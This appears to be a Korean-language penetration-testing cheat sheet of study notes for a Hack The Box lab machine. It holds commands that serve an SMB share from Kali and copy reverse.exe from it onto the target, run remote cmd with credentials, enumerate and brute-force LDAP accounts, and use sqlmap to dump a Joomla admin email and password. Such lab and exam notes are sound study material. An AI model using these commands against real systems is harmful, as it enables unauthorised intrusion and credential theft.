명령어 정리2

sed 치환 명령어

빈칸을 제거함
sed 's/ //g' id_rsa> rsa

 

Windows-Kali smbserver 파일전송

칼리
python /tools/tmp/impacket/examples/smbserver.py kali .

타겟
copy \칼리IP\kali\reverse.exe C:\PrivEsc\reverse.exe

 

winexec, psexec (칼리에서 원격 cmd 실행)

winexec -U 사용자%암호 //아이피 cmd

 

 

Enumeration

MSRPC & LDAP(Credential을 가지고 있어야 깊게 진행 가능..)

• msrpc
  root@kali:/HTB/Sauna# rpcdump.py 10.10.10.175 -p 135

• ldap
  nmap brute 제외하고 ldap 관련 스크립트 모두 실행
  nmap -n -sV --script "ldap* and not brute" 10.10.10.175

• 널세션 가능여부 체크
  ldapsearch -x -h 10.10.10.175 -D '' -w '' -b "DC=EGOTISTICAL-BANK,DC=LOCAL"

• ldap 계정 유무 브루트포스
  nmap --script ldap-brute -p 389 10.10.10.175

 

 

SQLMAP 진행 (시험에서 SQLMAP 사용 금지됨)

버프로 Request 인터셉터 후 텍스트파일로 저장 (request.txt)

sqlmap -r request.txt --dbms=mysql --dump

-r uses the intercepted request you saved earlier

--dbms: tells SQLMap what type of database management system it is
--dump: attempts to outputs the entire database

 

추출 순서

1. DBMS: --dbs
2. TABLE: -D joomla --tables
3. Columns: -D joomla -T users --columns
4. Values: –D joomla –T users –C admin_email,admin_pass --dump